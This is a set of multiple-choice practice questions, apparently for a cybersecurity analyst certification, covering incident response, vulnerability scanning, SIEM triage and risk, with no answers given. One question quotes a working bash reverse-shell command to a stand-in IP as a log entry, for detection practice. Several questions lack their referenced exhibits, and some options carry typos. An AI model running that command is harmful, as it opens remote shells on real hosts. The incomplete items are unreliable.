Which of the following does "federation" most likely refer to within the context of identity and access management?

A. Facilitating groups of users in a similar function or profile to system access that requires elevated or conditional access

B. An authentication mechanism that allows a user to utilize one set of credentials to access multiple domains

C. Utilizing a combination of what you know who you are, and what you have to grant authentication to a user

D. Correlating one’s identity with the attributes and associated applications the user has access to

An analyst receives threat intelligence regarding potential attacks from an actor with seemingly unlimited time and resources. Which of the following best describes the threat actor attributed to the malicious activity?

A. Insider threat

B. Ransomware group

C. Nation-state

D. Organized crime

A cybersecurity analyst is reviewing SIEM logs and observes consistent requests originating from an internal host to a blocklisted external server. Which of the following best describes the activity that is taking place?

A. Data exfiltration

B. Rogue device

C. Scanning

D. Beaconing

An organization has activated the CSIRT. A security analyst believes a single virtual server was compromised and immediately isolated from the network. Which of the following should the CSIRT conduct next?

A. Take a snapshot of the compromised server and verify its integrity

B. Restore the affected server to remove any malware

C. Contact the appropriate government agency to investigate

D. Research the malware strain to perform attribution

The management team requests monthly KPI reports on the company’s cybersecurity program. Which of the following KPIs would identify how long a security threat goes unnoticed in the environment?

A. Employee turnover

B. Intrusion attempts

C. Mean time to detect

D. Level of preparedness

The Chief Executive Officer of an organization recently heard that exploitation of new attacks in the industry was happening approximately 45 days after a patch was released. Which of the following would best protect this organization?

A. A mean time to remediate of 30 days

B. A mean time to detect of 45 days

C. A mean time to respond of 15 days

D. Third-party application testing

A cybersecurity analyst is doing triage in a SIEM and notices that the time stamps between the firewall and the host under investigation are off by 43 minutes. Which of the following is the most likely scenario occurring with the time stamps?

A. The NTP server is not configured on the host

B. The cybersecurity analyst is looking at the wrong information

C. The firewall is using UTC time

D. The host with the logs is offline

Which of the following risk management principles is accomplished by purchasing cyber insurance?

A. Accept

B. Avoid

C. Mitigate

D. Transfer

A security analyst is writing a shell script to identify IP addresses from the same country. Which of the following functions would help the analyst achieve the objective?

A. function w() { info=$(ping -c 1 $1 | awk -F “/” ‘END{print $1}’) && echo “$1 | $info” }

B. function x() { info=$(geoiplookup $1) && echo “$1 | $info” }

C. function y() { info=$(dig -x $1 | grep PTR | tail -n 1 ) && echo “$1 | $info” }

D. function z() { info=$(traceroute -m 40 $1 | awk ‘END{print $1}’) && echo “$1 | $info” }

A virtual web server in a server pool was infected with malware after an analyst used the internet to research a system issue. After the server was rebuilt and added back into the server pool, users reported issues with the website, indicating the site could not be trusted. Which of the following is the most likely cause of the server issue?

A. The server was configured to use SSL to securely transmit data.

B. The server was supporting weak TLS protocols for client connections.

C. The malware infected all the web servers in the pool.

D. The digital certificate on the web server was self-signed.

A security administrator has been notified by the IT operations department that some vulnerability reports contain an incomplete list of findings. Which of the following methods should be used to resolve this issue?

A. Credentialed scar

B. External scan

C. Differential scan

D. Network scan

A small company does not have enough staff to effectively segregate duties to prevent error and fraud in payroll management. The Chief Information Security Officer (CISO) decides to maintain and review logs and audit trails to mitigate risk. Which of the following did the CISO implement?

A. Corrective controls

B. Compensating controls

C. Operational controls

D. Administrative controls

A company that has a geographically diverse workforce and dynamic IPs wants to implement a vulnerability scanning method with reduced network traffic. Which of the following would best meet this requirement?

A. External

B. Agent-based

C. Non-credentialed

D. Credentialed

A penetration tester submitted data to a form in a web application, which enabled the penetration tester to retrieve user credentials. Which of the following should be recommended for remediation of this application vulnerability?

A. Implementing multifactor authentication on the server OS

B. Hashing user passwords on the web application

C. Performing input validation before allowing submission

D. Segmenting the network between the users and the web server

New employees in an organization have been consistently plugging in personal webcams despite the company policy prohibiting use of personal devices. The SOC manager discovers that new employees are not aware of the company policy. Which of the following will the SOC manager most likely recommend to help ensure new employees are accountable for following the company policy?

A. Human resources must email a copy of a user agreement to all new employees

B. Supervisors must get verbal confirmation from new employees indicating they have read the user agreement

C. All new employees must take a test about the company security policy during the onboardmg process

D. All new employees must sign a user agreement to acknowledge the company security policy

A manufacturer has hired a third-party consultant to assess the security of an OT network that includes both fragile and legacy equipment. Which of the following must be considered to ensure the consultant does no harm to operations?

A. Employing Nmap Scripting Engine scanning techniques

B. Preserving the state of PLC ladder logic prior to scanning

C. Using passive instead of active vulnerability scans

D. Running scans during off-peak manufacturing hours

Which of the following phases of the Cyber Kill Chain involves the adversary attempting to establish communication with a successfully exploited target?

A. Command and control

B. Actions on objectives

C. Exploitation

D. Delivery

A security analyst identified the following suspicious entry on the host-based IDS logs:
bash -i >& /dev/tcp/10.1.2.3/8080 0>&1
Which of the following shell scripts should the analyst use to most accurately confirm if the activity is ongoing?

A. #!/bin/bashnc 10.1.2.3 8080 -vv >dev/null && echo “Malicious activity” || echo “OK”

B. #!/bin/bashps -fea | grep 8080 >dev/null && echo “Malicious activity” || echo “OK”

C. #!/bin/bashls /opt/tcp/10.1.2.3/8080 >dev/null && echo “Malicious activity” || echo “OK”

D. #!/bin/bashnetstat -antp | grep 8080 >dev/null && echo “Malicious activity” || echo “OK”

A security analyst obtained the following table of results from a recent vulnerability assessment that was conducted against a single web server in the environment:
 
Which of the following should be completed first to remediate the findings?

A. Ask the web development team to update the page contents

B. Add the IP address allow listing for control panel access

C. Purchase an appropriate certificate from a trusted root CA

D. Perform proper sanitization on all fields

During an incident, an analyst needs to acquire evidence for later investigation. Which of the following must be collected first in a computer system, related to its volatility level?

A. Disk contents

B. Backup data

C. Temporary files

D. Running processes

A security team is concerned about recent Layer 4 DDoS attacks against the company website. Which of the following controls would best mitigate the attacks?

A. Block the attacks using firewall rules

B. Deploy an IPS in the perimeter network

C. Roll out a CDN

D. Implement a load balancer

During a cybersecurity incident, one of the web servers at the perimeter network was affected by ransomware. Which of the following actions should be performed immediately?

A. Shut down the server.

B. Reimage the server.

C. Quarantine the server.

D. Update the OS to latest version.

Which of the following describes the best reason for conducting a root cause analysis?

A. The root cause analysis ensures that proper timelines were documented.

B. The root cause analysis allows the incident to be properly documented for reporting.

C. The root cause analysis develops recommendations to improve the process.

D. The root cause analysis identifies the contributing items that facilitated the event.

A cybersecurity analyst is recording the following details:
•	ID
•	Name
•	Description
•	Classification of information
•	Responsible party
In which of the following documents is the analyst recording this information?

A. Risk register

B. Change control documentation

C. Incident response playbook

D. Incident response plan

A vulnerability scanner generates the following output:
 
The company has an SLA for patching that requires time frames to be met for high-risk vulnerabilities. Which of the following should the analyst prioritize first for remediation?

A. Oracle JDK

B. Cisco Webex

C. Redis Server

D. SSL Self-signed Certificate

Which of the following best describes the key elements of a successful information security program?

A. Business impact analysis, asset and change management, and security communication plan

B. Security policy implementation, assignment of roles and responsibilities, and information asset classification

C. Disaster recovery and business continuity planning, and the definition of access control requirements and human resource policies

D. Senior management organizational structure, message distribution standards, and procedures for the operation of security management systems

A systems administrator is reviewing after-hours traffic flows from data-center servers and sees regular outgoing HTTPS connections from one of the servers to a public IP address. The server should not be making outgoing connections after hours. Looking closer, the administrator sees this traffic pattern around the clock during work hours as well. Which of the following is the most likely explanation?

A. C2 beaconing activity

B. Data exfiltration

C. Anomalous activity on unexpected ports

D. Network host IP address scanning

E. A rogue network device

Which of the following will most likely ensure that mission-critical services are available in the event of an incident?

A. Business continuity plan

B. Vulnerability management plan

C. Disaster recovery plan

D. Asset management plan

The analyst reviews the following endpoint log entry:
 
Which of the following has occurred?

A. Registry change

B. Rename computer

C. New account introduced

D. Privilege escalation

Two employees in the finance department installed a freeware application that contained embedded malware. The network is robustly segmented based on areas of responsibility. These computers had critical sensitive information stored locally that needs to be recovered. The department manager advised all department employees to turn off their computers until the security team could be contacted about the issue. Which of the following is the first step the incident response staff members should take when they arrive?

A. Turn on all systems, scan for infection, and back up data to a USB storage device.

B. Identify and remove the software installed on the impacted systems in the department.

C. Explain that malware cannot truly be removed and then reimage the devices.

D. Log on to the impacted systems with an administrator account that has privileges to perform backups.

E. Segment the entire department from the network and review each computer offline.

Which of the following is the best way to begin preparation for a report titled "What We Learned" regarding a recent incident involving a cybersecurity breach?

A. Determine the sophistication of the audience that the report is meant for

B. Include references and sources of information on the first page

C. Include a table of contents outlining the entire report

D. Decide on the color scheme that will effectively communicate the metrics

A cybersecurity analyst is tasked with scanning a web application to understand where the scan will go and whether there are URIs that should be denied access prior to more in-depth scanning. Which of following best fits the type of scanning activity requested?

A. Uncredentialed scan

B. Discovery scan

C. Vulnerability scan

D. Credentialed scan

An organization conducted a web application vulnerability assessment against the corporate website, and the following output was observed:
 
Which of the following tuning recommendations should the security analyst share?

A. Set an HttpOnly flag to force communication by HTTPS

B. Block requests without an X-Frame-Options header

C. Configure an Access-Control-Allow-Origin header to authorized domains

D. Disable the cross-origin resource sharing header

A security analyst has prepared a vulnerability scan that contains all of the company’s functional subnets. During the initial scan users reported that network printers began to print pages that contained unreadable text and icons. Which of the following should the analyst do to ensure this behavior does not occur during subsequent vulnerability scans?

A. Perform non-credentialed scans

B. Ignore embedded web server ports

C. Create a tailored scan for the printer subnet

D. Increase the threshold length of the scan timeout

A cybersecurity analyst has recovered a recently compromised server to its previous state. Which of the following should the analyst perform next?

A. Eradication

B. Isolation

C. Reporting

D. Forensic analysis

A security analyst receives an alert for suspicious activity on a company laptop. An excerpt of the log is shown below:
 
Which of the following has most likely occurred?

A. An Office document with a malicious macro was opened.

B. A credential-stealing website was visited.

C. A phishing link in an email was clicked.

D. A web browser vulnerability was exploited.

Which of the following concepts is using an API to insert bulk access requests from a file into an identity management system an example of?

A. Command and control

B. Data enrichment

C. Automation

D. Single sign-on

A SOC manager receives a phone call from an upset customer. The customer received a vulnerability report two hours ago: but the report did not have a follow-up remediation response from an analyst. Which of the following documents should the SOC manager review to ensure the team is meeting the appropriate contractual obligations for the customer?

A. SLA

B. MOU

C. NDA

D. Limitation of liability

A web application team notifies a SOC analyst that there are thousands of HTTP/404 events on the public-facing web server. Which of the following is the next step for the analyst to take?

A. Instruct the firewall engineer that a rule needs to be added to block this external server

B. Escalate the event to an incident and notify the SOC manager of the activity

C. Notify the incident response team that there is a DDoS attack occurring

D. Identify the IP/hostname for the requests and look at the related activity

An analyst is reviewing a vulnerability report and must make recommendations to the executive team. The analyst finds that most systems can be upgraded with a reboot resulting in a single downtime window. However, two of the critical systems cannot be upgraded due to a vendor appliance that the company does not have access to. Which of the following inhibitors to remediation do these systems and associated vulnerabilities best represent?

A. Proprietary systems

B. Legacy systems

C. Unsupported operating systems

D. Lack of maintenance windows

A cloud team received an alert that unauthorized resources were being auto-provisioned. After investigating, the team suspects that cryptomining is occurring. Which of the following indicators would most likely lead the team to this conclusion?

A. High GPU utilization

B. Bandwidth consumption

C. Unauthorized changes

D. Unusual traffic spikes

A Chief Information Security Officer has outlined several requirements for a new vulnerability scanning project:
•	Must use minimal network bandwidth
•	Must use minimal host resources
•	Must provide accurate, near real-time updates
•	Must not have any stored credentials in configuration on the scanner
Which of the following vulnerability scanning methods should be used to best meet these requirements?

A. Internal

B. Agent

C. Active

D. Uncredentialed

An older CVE with a vulnerability score of 7.1 was elevated to a score of 9.8 due to a widely available exploit being used to deliver ransomware. Which of the following factors would an analyst most likely communicate as the reason for this escalation?

A. Scope

B. Weaponization

C. CVSS

D. Asset value

A security analyst has found the following suspicious DNS traffic while analyzing a packet capture:
•	DNS traffic while a tunneling session is active.
•	The mean time between queries is less than one second.
•	The average query length exceeds 100 characters.
Which of the following attacks most likely occurred?

A. DNS exfiltration

B. DNS spoofing

C. DNS zone transfer

D. DNS poisoning

A security analyst recently joined the team and is trying to determine which scripting language is being used in a production script to determine if it is malicious. Given the following script:
 
Which of the following scripting languages was used in the script?

A. PowerShell

B. Ruby

C. Python

D. Shell script

A security analyst performs a vulnerability scan. Based on the metrics from the scan results, the analyst must prioritize which hosts to patch. The analyst runs the tool and receives the following output:
 
Which of the following hosts should be patched first, based on the metrics?

A. host01

B. host02

C. host03

D. host04

An organization discovered a data breach that resulted in PII being released to the public. During the lessons learned review, the panel identified discrepancies regarding who was responsible for external reporting, as well as the timing requirements. Which of the following actions would best address the reporting issue?

A. Creating a playbook denoting specific SLAs and containment actions per incident type

B. Researching federal laws, regulatory compliance requirements, and organizational policies to document specific reporting SLAs

C. Defining which security incidents require external notifications and incident reporting in addition to internal stakeholders

D. Designating specific roles and responsibilities within the security team and stakeholders to streamline tasks

While reviewing web server logs, a security analyst found the following line:

Which of the following malicious activities was attempted?

A. Command injection

B. XML injection

C. Server-side request forgery

D. Cross-site scripting

Which of the following would a security analyst most likely use to compare TTPs between different known adversaries of an organization?

A. MITRE ATT&CK

B. Cyber Kill Cham

C. OWASP

D. STIX/TAXII

A laptop that is company owned and managed is suspected to have malware. The company implemented centralized security logging. Which of the following log sources will confirm the malware infection?

A. XDR logs

B. Firewall legs

C. IDS logs

D. MFA logs